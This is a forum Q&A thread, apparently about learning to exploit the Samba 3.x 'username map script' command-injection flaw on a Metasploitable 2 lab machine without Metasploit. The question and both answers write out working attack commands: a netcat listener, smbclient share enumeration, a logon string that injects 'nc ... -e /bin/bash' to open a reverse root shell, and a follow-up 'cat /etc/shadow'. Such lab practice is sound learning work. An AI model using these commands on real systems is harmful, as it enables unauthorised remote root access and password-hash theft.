Reverse connection Metasploitable 2 -> Kali Linux (Samba 3.x) without Metasploit

Question

I am trying to exploit Metasploitable 2 without the use of Metasploit, with the aim of learning. In this case, I am focusing on Samba 3.x (Port TCP 139, 445)

In this link http://www.rwbnetsec.com/samba-3-x/ two different methods are explained to exploit this machine after an nmap scan reveals TCP ports 139, and 445 open, which are running Samba version 3.x.

The second method explains that

This vulnerability takes advantage of the “username map script” functionality of Samba. There is no filtering of user input, so an attacker could connect to an SMB session, and use shell metacharacters as input for the username, causing the commands to be executed on the remote system. This could allow the attacker to gain a remote shell to the victim machine with root access.

My problem comes when Metasploit is used, as it is used in:

• http://www.reydes.com/d/?q=Explotar_Vulnerabilidad_username_map_script_de_Samba_con_MSF
• http://resources.infosecinstitute.com/hacking-and-gaining-access-to-linux-by-exploiting-samba-service/

I finally found this video https://www.youtube.com/watch?v=-Y8-fZAvq9c that avoids Metasploit but it doesn't work for me, where it follows (Kali=192.168.200.1; Metasploitable2=192.168.200.130):

1. In Terminal window 1, we set netcat to listen:

   netcat -nlvp 4444

2. In Terminal window 2, we check the share

   smbclient -L //192.168.200.130

3. We focus on the tmp folder, and connect (Terminal 2):

   smbclient //192.168.200.130/tmp

4. Finally, we obtain "smb: >" where the command "logon" is used to reverse connect to Kali, as

   smb: > logon "/=nc 192.168.200.1 4444 -e /bin/bash"

This last point doesn't work for me with the following error message "session setup failed: NT_STATUS_NO_MEMORY".

It is hard for me to find a good manual that explains the "logon" command. I tried changing the way netcat is used:

In point 1. I write

smb: \> nc -nlvp 4444 -e /bin/bash

In point 4. I write

smb: \> logon "/=`nc 192.168.200.1 4444 -e /bin/bash`"

Same results. Same message error.

I really tried to do it by myself, but couldn't. I would be very grateful if you could help me.

Thank you in advance!!

Answer 1

It looks like you are setting up your listener in smb (vulnerable box).

smb: \> nc -nlvp 4444 -e /bin/bash

What you should be doing is setting up the listener in your attacking box. using the following command instead:

nc -nlvp 4444 

Finally from your metasploitable2 you issue the command:

logon "/=`nc 'attack box ip' 4444 -e /bin/bash`"

Answer 2

For those who had the same problem I had, I answer how I solved it, according to the previous answers, and to this link Metasploitable 2 - Samba

The steps to follow are:

1. We open Terminal window 1, and we set netcat to listen:

   netcat -nlvp 4444

2. We open Terminal window 2, we check the victim shares:

   smbclient -L //192.168.200.130

3. (Terminal 2) We focus on the tmp folder, and connect to victim:

   smbclient //192.168.200.130/tmp

4. (Terminal 2) Finally, we obtain smb: > where the command logon is used to reverse connect to Kali, as

   smb: \> logon "/=`nc 192.168.200.1 4444 -e /bin/bash`"

Careful: do not forget the back tick.

5. (Terminal 1) We can see the connection established and can insert our desired commands. Example:

   • id
   • hostname
   • uname -a
   • cat /etc/shadow

When password is prompted, just click on enter (leaving empty).